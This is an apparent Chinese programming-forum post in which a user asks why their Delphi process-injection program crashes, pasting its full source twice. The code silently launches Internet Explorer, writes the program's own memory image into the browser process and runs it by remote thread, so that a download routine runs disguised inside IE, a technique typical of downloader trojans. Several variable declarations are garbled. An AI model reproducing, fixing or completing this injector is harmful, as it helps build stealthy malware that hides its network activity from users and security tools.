S
starsoul
Unregistered / Unconfirmed
GUEST, unregistred user!
在写进程注入程序时,我想得到网页上的内容,并不是下载网页,编译成功后运行出错.如果使用UrlDownloadToFile就可以下载程序,运行不会出错,如果使用我自己写的得到网页内容的函数就会出错,请帮我看看哪里出了问题,谢谢!先送上200分.
完整源代码如下:
program InjectTheSelf;
{$IMAGEBASE $13140000}
uses Windows, ShellApI, WinInet, Dialogs, SysUtils, StrUtils, Messages, StdCtrls, Classes, Controls;
function GetWebPage(const Url: string):string; //得到网页文件内容函数
var
Session,
HttpFile:HINTERNET;
szSizeBuffer
ointer;
dwLengthSizeBuffer
Word;
dwReservedWord;
dwFileSizeWord;
dwBytesReadWord;
ContentsChar;
begin
Session:=InternetOpen('',0,niL,niL,0);
HttpFile:=InternetOpenUrl(Session,PChar(Url),niL,0,0,0);
dwLengthSizeBuffer:=1024;
HttpQueryInfo(HttpFile,5,szSizeBuffer,dwLengthSizeBuffer,dwReserved);
GetMem(Contents,dwFileSize);
InternetReadFile(HttpFile,Contents,dwFileSize,dwBytesRead);
InternetCloseHandle(HttpFile);
InternetCloseHandle(Session);
Result:=StrPas(Contents);
FreeMem(Contents);
end;
//插入IE需要用到的函数
function GetIEAppPath:string;
var
iekey: Hkey;
iename: array [0..255] of char;
vType,dLengthWORD;
begin
vType := REG_SZ;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,'Software/Microsoft/Windows/CurrentVersion/App Paths/IEXPLORE.EXE',0,KEY_ALL_ACCESS,iekey);
dLength := SizeOf(iename);
if RegQueryValueEx(iekey, '' , nil, @vType, @iename[0], @dLength) = 0 then
Result := iename
else
Result := '%programfiles%/Internet Explorer/IEXPLORE.EXE';
RegCloseKey(iekey);
end;
procedure Download; //下载过程
var
i:integer;
sl:TStringList;
begin
sl:=TStringList.Create;
sl.Text:=GetWebPage('http://127.0.0.1/ip.txt'); //得到配置文件内容
for I := 0 to sl.Count - 1 do
ShowMessage(sl); //显示文本文件每一行内容
ExitProcess(0); //删除打开的IE进程
end;
procedure Inject(ProcessHandle: longword; EntryPoint: pointer);
var
Module, NewModule: Pointer;
Size, BytesWritten, TID: longword;
begin
//这里得到的值为一个返回指针型变量,指向内容包括进程映像的基址
Module := Pointer(GetModuleHandle(nil));
//得到内存映像的长度
Size := PImageOptionalHeader(Pointer(integer(Module) + PImageDosHeader(Module)._lfanew +
SizeOf(dword) + SizeOf(TImageFileHeader))).SizeOfImage;
//在Exp进程的内存范围内分配一个足够长度的内存
VirtualFreeEx(ProcessHandle, Module, 0, MEM_RELEASE);
//确定起始基址和内存映像基址的位置
NewModule := VirtualAllocEx(ProcessHandle, Module, Size, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
//确定上面各项数据后,这里开始进行操作
WriteProcessMemory(ProcessHandle, NewModule, Module, Size, BytesWritten);
//建立远程线程,至此注入过程完成
CreateRemoteThread(ProcessHandle, nil, 0, EntryPoint, Module, 0, TID);
end;
procedure RunInject();
var
ProcessHandle, PID: longword;
//注入iexplore.exe
begin
//CreateProcess(nil,PChar(GetIEAppPath), nil, nil, False, 0, nil, nil, StartupInfo, ProcessInfo);
winexec(PChar(GetIEAppPath),sw_hide);
sleep(500);
GetWindowThreadProcessId(FindWindow('IEFrame', nil), @Pid);
//打开进程
ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, PID);
Inject(ProcessHandle, @Download);
//关闭对像
CloseHandle(ProcessHandle);
end;
BEGIN
RunInject(); //注入iexplore.exe
end.
完整源代码如下:
program InjectTheSelf;
{$IMAGEBASE $13140000}
uses Windows, ShellApI, WinInet, Dialogs, SysUtils, StrUtils, Messages, StdCtrls, Classes, Controls;
function GetWebPage(const Url: string):string; //得到网页文件内容函数
var
Session,
HttpFile:HINTERNET;
szSizeBuffer
ointer;dwLengthSizeBuffer
Word;dwReserved
Word;dwFileSize
Word;dwBytesRead
Word;Contents
Char;begin
Session:=InternetOpen('',0,niL,niL,0);
HttpFile:=InternetOpenUrl(Session,PChar(Url),niL,0,0,0);
dwLengthSizeBuffer:=1024;
HttpQueryInfo(HttpFile,5,szSizeBuffer,dwLengthSizeBuffer,dwReserved);
GetMem(Contents,dwFileSize);
InternetReadFile(HttpFile,Contents,dwFileSize,dwBytesRead);
InternetCloseHandle(HttpFile);
InternetCloseHandle(Session);
Result:=StrPas(Contents);
FreeMem(Contents);
end;
//插入IE需要用到的函数
function GetIEAppPath:string;
var
iekey: Hkey;
iename: array [0..255] of char;
vType,dLength
WORD;begin
vType := REG_SZ;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,'Software/Microsoft/Windows/CurrentVersion/App Paths/IEXPLORE.EXE',0,KEY_ALL_ACCESS,iekey);
dLength := SizeOf(iename);
if RegQueryValueEx(iekey, '' , nil, @vType, @iename[0], @dLength) = 0 then
Result := iename
else
Result := '%programfiles%/Internet Explorer/IEXPLORE.EXE';
RegCloseKey(iekey);
end;
procedure Download; //下载过程
var
i:integer;
sl:TStringList;
begin
sl:=TStringList.Create;
sl.Text:=GetWebPage('http://127.0.0.1/ip.txt'); //得到配置文件内容
for I := 0 to sl.Count - 1 do
ShowMessage(sl); //显示文本文件每一行内容
ExitProcess(0); //删除打开的IE进程
end;
procedure Inject(ProcessHandle: longword; EntryPoint: pointer);
var
Module, NewModule: Pointer;
Size, BytesWritten, TID: longword;
begin
//这里得到的值为一个返回指针型变量,指向内容包括进程映像的基址
Module := Pointer(GetModuleHandle(nil));
//得到内存映像的长度
Size := PImageOptionalHeader(Pointer(integer(Module) + PImageDosHeader(Module)._lfanew +
SizeOf(dword) + SizeOf(TImageFileHeader))).SizeOfImage;
//在Exp进程的内存范围内分配一个足够长度的内存
VirtualFreeEx(ProcessHandle, Module, 0, MEM_RELEASE);
//确定起始基址和内存映像基址的位置
NewModule := VirtualAllocEx(ProcessHandle, Module, Size, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
//确定上面各项数据后,这里开始进行操作
WriteProcessMemory(ProcessHandle, NewModule, Module, Size, BytesWritten);
//建立远程线程,至此注入过程完成
CreateRemoteThread(ProcessHandle, nil, 0, EntryPoint, Module, 0, TID);
end;
procedure RunInject();
var
ProcessHandle, PID: longword;
//注入iexplore.exe
begin
//CreateProcess(nil,PChar(GetIEAppPath), nil, nil, False, 0, nil, nil, StartupInfo, ProcessInfo);
winexec(PChar(GetIEAppPath),sw_hide);
sleep(500);
GetWindowThreadProcessId(FindWindow('IEFrame', nil), @Pid);
//打开进程
ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, PID);
Inject(ProcessHandle, @Download);
//关闭对像
CloseHandle(ProcessHandle);
end;
BEGIN
RunInject(); //注入iexplore.exe
end.